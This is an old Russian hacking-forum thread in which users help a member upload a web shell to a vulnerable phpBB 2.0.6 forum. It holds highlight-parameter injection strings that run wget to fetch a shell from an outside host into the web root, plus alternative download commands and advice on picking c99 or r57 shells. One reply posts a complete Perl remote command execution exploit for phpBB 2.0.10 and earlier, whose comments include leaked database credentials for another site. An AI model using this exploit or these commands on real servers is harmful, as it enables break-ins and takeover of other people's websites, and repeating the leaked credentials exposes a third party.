Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Заливка шелла на phpBB 2.0.6 через highlights |

07.01.2006, 00:09
|
|
Новичок
Регистрация: 31.12.2005
Сообщений: 5
Провел на форуме: 10223
Репутация:
1
|
|
Заливка шелла на phpBB 2.0.6 через highlights
Здравствуйте житили античата,я квам пришол с такой проблемой...прошу мою проблему не отвергать а ответить на нее...
Есть форум phpBB 2.0.6 уязвим но как тока я хочю залить на него шелл вот такой команндой:
&highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/
то оно сначала грузит грузит а потом резко остонавлеваеться и неможет загрузить,я думал что оно шелл залило хахожу по ссылки www.site.ru/forum/remview.php а сайт говорит что такого файла нету,значит выходит с этого что шелл НЕ ЗАЛИЛСЯ !!!
и еще когда пробую GET заливать тоже самое..
Ответте мне на токую проблему пожалуста.... 
как можно прито-ком залить шелл ???
|
|
|

07.01.2006, 00:21
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
Ну...вы, батенька, напишите адресок форума, а мы (я точно) постараемся вам в этом "нелёгком" деле помочь. Пиши хотя бы в асю, если тут боязно.
Кстати, кто сказал, что там WGET работает???
Последний раз редактировалось DRON-ANARCHY; 07.01.2006 в 00:30..
Причина: Мысля..
|
|
|

07.01.2006, 01:07
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Сообщение от ded2006
&highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/
Если wget работает
wget -o home/www/forum/Nazvanie_Faila.php http://xxxx.x.xx/remview.php
Плюс попробуй изменить расширение шелла на твоём сайте на txt.
Последний раз редактировалось Azazel; 07.01.2006 в 01:10..
|
|
|

07.01.2006, 03:12
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме: 560754
Репутация:
97
|
|
проверь какая качалка стоит на сайте which wget (curl,get,fetch) посмотри какие у тебя права (id) и убедись что папка в которую хочешь залить шелл открыта для записи,проверь правильность пути куда будешь заливать ессли в другую папку.
и воще remview.php имхо ужанно неудобный шел лучше заюзать c99 или последнюю версию r57.
|
|
|

07.01.2006, 06:44
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме: 5868159
Репутация:
950
|
|
|
|
|

07.01.2006, 13:27
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
|
|
|

07.01.2006, 14:24
|
|
Новичок
Регистрация: 04.01.2006
Сообщений: 16
Провел на форуме: 23727
Репутация:
1
|
|
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
Вот тебе блин все что хочешь ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
Код:
#!/usr/bin/perl
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if ( @ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]
CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###
Качай Активе перд и пользуйся. Не ломай бошку всякими загрузками шелла
Последний раз редактировалось N1ckeZ; 07.01.2006 в 14:27..
|
|
|

07.01.2006, 20:34
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме: 1867718
Репутация:
268
|
|
Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al
|
|
|

07.01.2006, 22:03
|
|
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме: 299584
Репутация:
4
|
|
|
|
|

07.01.2006, 23:50
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al
Сначала читай посты, прежде чем писать.
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
Сплойт работает ДО 10 ВЕРСИИ ВКЛЮЧИТЕЛЬНО. причем этот сплойт там не работает.
Есть более хорошая статья, но не всем доступна...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|